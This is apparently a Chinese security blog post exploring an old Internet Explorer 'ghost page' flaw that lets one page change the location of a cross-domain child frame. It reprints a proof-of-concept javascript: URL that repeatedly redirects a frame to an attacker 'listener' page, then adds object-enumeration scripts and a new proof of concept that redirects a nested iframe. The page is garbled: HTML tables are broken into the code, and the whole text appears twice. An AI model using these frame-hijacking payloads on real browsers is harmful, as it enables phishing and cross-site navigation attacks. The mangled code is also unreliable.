为了不落后,也学习下鬼页。
先看下POC
http://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html
代码:
处于好奇和进一步发掘我们遍历了这个 ‘x’ 对象。
代码
";
for(var p in obj){
if(typeof(obj[p])=="function"){
obj[p]();
}else{
try
{
props+="
";
}
catch (ex)
{
props+= "
";
}
}
}
document.write(props+"
");
}
x=open('http://planet.ph4nt0m.org/');
setTimeout(function(){allPrpos(x.frames[0])},5000);
</script>
结果:
除开 on开头的一些事件外,只有下面几个可以使用。
也就是说 POC代码中的x.frames[0].location 有据可依。我们继续测试下是否只有 '鬼页'的
x.frames[0].location 可控制呢,简单修改下代码遍历 iframe 对象:
";
for(var p in obj){
if(typeof(obj[p])=="function"){
obj[p]();
}else{
try
{
props+="
";
}
catch (ex)
{
props+= "
";
}
}
}
document.write(props+"
");
}
setTimeout(function(){allPrpos(document.frames[0].frames[0])},5000);
</script>
id="frm" src="http://planet.ph4nt0m.org/" width="80%" height="100%">
同样得到可访问对象 location
新的POC:
最后的测试结果是 在IE7/6 可以用本文提到的方式控制子frame的 location ,却无法执行伪协议,待进一步测试。
先看下POC
http://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html
代码:
javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);QZ说 这段代码展示了跨域操作location ,事实也是。
处于好奇和进一步发掘我们遍历了这个 ‘x’ 对象。
代码
<script language="javascript">
function allPrpos(obj) {
// 遍历对象
var props = "
| 名称 | 值 |
| "+p + " | " + obj[ p ] + " |
| "+p + " | " +ex.message+" |
结果:
| 名称 | 值 |
| onbeforeunload | null |
| onafterprint | null |
| top | [object] |
| location | |
| parent | [object] |
| offscreenBuffering | Access is denied. |
| frameElement | Access is denied. |
| onerror | null |
| screen | Access is denied. |
| event | Access is denied. |
| clipboardData | Access is denied. |
| onresize | null |
| defaultStatus | Access is denied. |
| onblur | null |
| window | [object] |
| onload | null |
| onscroll | null |
| screenTop | Access is denied. |
| onfocus | null |
| Option | Access is denied. |
| length | 0 |
| onbeforeprint | null |
| frames | [object] |
| self | [object] |
| clientInformation | Access is denied. |
| XMLHttpRequest | Access is denied. |
| external | Access is denied. |
| screenLeft | Access is denied. |
| opener | undefined |
| onunload | null |
| document | Access is denied. |
| closed | false |
| history | Access is denied. |
| Image | Access is denied. |
| navigator | Access is denied. |
| status | Access is denied. |
| onhelp | null |
| name | Access is denied. |
| top | [object] |
| location | |
| parent | [object] |
| window | [object] |
| length | 0 |
| closed | false |
x.frames[0].location 可控制呢,简单修改下代码遍历 iframe 对象:
<script language="javascript">
function allPrpos(obj) {
// 遍历对象
var props = "
| 名称 | 值 |
| "+p + " | " + obj[ p ] + " |
| "+p + " | " +ex.message+" |
id="frm" src="http://planet.ph4nt0m.org/" width="80%" height="100%">
同样得到可访问对象 location
| top | [object] |
| location | |
| parent | [object] |
新的POC:
<script language="javascript">
setTimeout(function(){document.frames[0].frames[0].location=new location("//www.cncert.net")},5000);
</script>
id="frm" src="http://planet.ph4nt0m.org/" width="80%" height="100%">
最后的测试结果是 在IE7/6 可以用本文提到的方式控制子frame的 location ,却无法执行伪协议,待进一步测试。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
